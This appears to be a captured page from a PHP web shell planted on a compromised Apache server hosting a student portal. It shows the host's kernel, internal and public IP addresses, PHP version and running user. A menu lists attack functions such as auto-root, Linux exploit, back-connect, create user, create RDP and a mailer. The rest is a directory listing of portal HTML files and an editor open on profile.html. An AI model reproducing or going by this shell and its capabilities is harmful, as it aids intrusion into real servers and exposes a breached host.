Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.128.94.112
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
studentportal_wait /
html_modules_old /
[ HOME SHELL ]
Name
Size
Permission
Action
attendance.html
2.08
KB
-rwxr-xr-x
chngMobNum.html
2.81
KB
-rwxr-xr-x
examApplication.html
9.12
KB
-rwxr-xr-x
examApplication1.html
495
B
-rwxr-xr-x
examApplication_bkp.html
2.75
KB
-rwxr-xr-x
examtimetable.html
1.29
KB
-rwxr-xr-x
hallTicket.html
4.67
KB
-rwxr-xr-x
helpDesk.html
517
B
-rwxr-xr-x
internalAssessment.html
1.57
KB
-rwxr-xr-x
listrvrtApps.html
469
B
-rwxr-xr-x
notification.html
1.16
KB
-rwxr-xr-x
oldQPDownload.html
1.08
KB
-rwxr-xr-x
payment_page.html
642
B
-rwxr-xr-x
practicaltimetable.html
1.22
KB
-rwxr-xr-x
profile.html
1.46
KB
-rwxr-xr-x
results.html
4.93
KB
-rwxr-xr-x
results1.html
78
B
-rwxr-xr-x
rvappstatus.html
646
B
-rwxr-xr-x
rvrtapp.html
1.53
KB
-rwxr-xr-x
yourExmAppList.html
479
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : profile.html
<div class="card" style="margin: 25px 50px; border-radius:20px "> <div class="header" style="background-color:#133c55;border-radius:20px 20px 0px 0px" > <h2 style="color: white"> <center>Student Profile</center> </h2> </div> <div class="body"> <div class="row clearfix"> <div class="col-xs-12 col-md-8" name="perinfo"> <!-- style="border-radius: 15px !important;border-collapse: unset;border: 1px solid black;padding: 10px;" --> <table id="studinfo" class="table no-border" style="margin-left: 5%" ></table> </div> </div> </div> </div> <div class="card" id="idSubjCard" style="min-height:50vh;margin:20px 50px; border-radius:20px " > <div class="header" id="idSubjHeader" style="background-color:#133c55;border-radius:20px 20px 0px 0px" ></div> <div class="body" style="padding: 0px"> <div class="row clearfix"> <div class=" col-xs-12 col-md-12 col-lg-12" name="perinfo" style="width: 100%" > <table id="studsubs" class="table table-condensed table-bordered table-striped table-hover" style="width: 100%;border-left-style: hidden;border-right-style: hidden;" ></table> </div> </div> <div class="row clearfix"> <div class="col-lg-8 col-md-offset-2 col-md-8 col-sm-12 col-xs-12" id="pnote" ></div> </div> </div> </div>
Close